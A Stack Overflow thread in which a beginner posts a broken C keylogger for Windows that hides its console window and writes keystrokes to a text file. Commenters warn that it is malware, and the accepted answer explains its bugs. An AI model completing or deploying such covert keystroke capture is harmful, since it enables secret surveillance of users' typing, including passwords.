# Why won't my keylogger work?

Tags: c, winapi

After learning the basics in C, I have moved on to study some of the Win API functions. For educational purposes, I decided to try and make a simple keylogger. All it does is record keystrokes and save them to a .txt file. I have seen some examples on the internet, but I want to make it my way (which is simpler). Here's my code (I don't know why it's not working) (I haven't finished it yet):

```
#include <stdio.h>
#include <windows.h>

int main( void )
{
    short UserInputtedCharacter;
    FILE *LogFile = fopen("log.txt", "a");

    //Hide console window
    HWND HideWindow;
    AllocConsole();
    HideWindow = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(HideWindow, 0);

    while(1)
    {
        GetAsyncKeyState(UserInputtedCharacter);

        switch(UserInputtedCharacter)
        {
            case VK_SPACE:
                fputc(' ', LogFile);
                break;
            case VK_RETURN:
                fputc('\n', LogFile);
                break;
            case VK_BACK:
                fputs("[BACKSPACE]", LogFile);
                break;
            case VK_DELETE:
                fputs("[DEL]", LogFile);
                break;
            case VK_CAPITAL:
                fputs("[CAPS LOCK]", LogFile);
                break;
            case 0x30:
                fputc('0', LogFile);
                break;
            case 0x31:
                fputc('1', LogFile);
                break;
            case 0x32:
                fputc('2', LogFile);
                break;
            case 0x33:
                fputc('3', LogFile);
                break;
            case 0x34:
                fputc('4', LogFile);
                break;
            case 0x35:
                fputc('5', LogFile);
                break;
            case 0x36:
                fputc('6', LogFile);
                break;
            case 0x37:
                fputc('7', LogFile);
                break;
            case 0x38:
                fputc('8', LogFile);
                break;
            case 0x39:
                fputc('9', LogFile);
                break;
            case 0x61:
                fputc('a', LogFile);
                break;
            case 0x62:
                fputc('b', LogFile);
                break;
            case 0x63:
                fputc('c', LogFile);
                break;
            case 0x64:
                fputc('d', LogFile);
                break;
        }
    }
    fclose(LogFile);
    return 0;
}
```

The program isn't saving the keystrokes to the .txt file.

By the way, the program is far from finished, I was just wondering why it isn't working.

Comment: Welcome to [so], it's great to see another young programmer here. Could you describe what you mean by "not working"? When you have time, take a look at the [help] to see how we work and some of the ways we do things here. Thank you!

Comment: A very nice welcome @Qantas94Heavy, very warm

Comment: Writing out the full set of characters one by one is painfully repetitive (and error prone). You should review macros such as `isascii()` and `isprint()` or `isalnum()` from `#include <ctype.h>`, which would allow you to squish the code considerably.

Comment: I would recommend you choose a different starter project. This is a very complex problem and your program risks being flagged as malware.

Comment: @RaymondChen You're right, I looked at the sources to some other C keyloggers and they were much more complicated (a lot of them messed around with registry keys), I'm just trying to do this a simpler way.

Comment: @JonathanLeffler Yes, but if I used functions such as those, I wouldn't be able to tell if the user typed in a capital "A" vs a lower case "a" in the log file. Am I correct?

Comment: Again, I recommend that you not use malware as a way to learn Windows programming. Malware techniques are usually opposite to best practices because they are malware.

Comment: Yes, you would. `fputc(UserInputtedCharacter, LogFile);` would put `a` when the input is `a` and `A` when the input is `A` etc. because `UserInputtedCharacter` would contain a value equivalent to `a` or `A`.  You do need to ensure it is a character code in the simple character range (so 32-126 or thereabouts); that's what the `isascii()` test is for — noting that `isascii()` is not a standard C function, but it is commonly available.

Comment: +1 to encourage you :) and also the fact that the question was useful, had research and was clear.

Comment: This question appears to be off-topic because it is about developing potential malware.

Answer (score 3, accepted):

There are many things that you have to fix.

1. `GetAsyncKeyState` does not modify the parameter is it given. You could remove the call altogether the way it is written. Your compiler probably complained about `UserInputtedCharacter` being read before it was initialized.
2. Windows programs are event based. You [should write an event loop](http://www.winprog.org/tutorial/message_loop.html) and look for WM_KEYDOWN and WM_KEYUP.
3. You have a very tight loop that will consume all of the CPU of the core it is running on. If you don't want / need an event loop, look into `getc()` or similar.
4. Process are pretty isolated by default. Reading key strokes for every application is hard.

Nothing you can't learn, of course. But think about starting with a simpler project. A self contained application that connect to the internet and retreives StackOverflow's home page should be challenging enough.

Comment: Okay, thank you. Other keylogger sources had much more complicated code than this, I was trying to make it simpler. I guess the complicated stuff was there for a reason.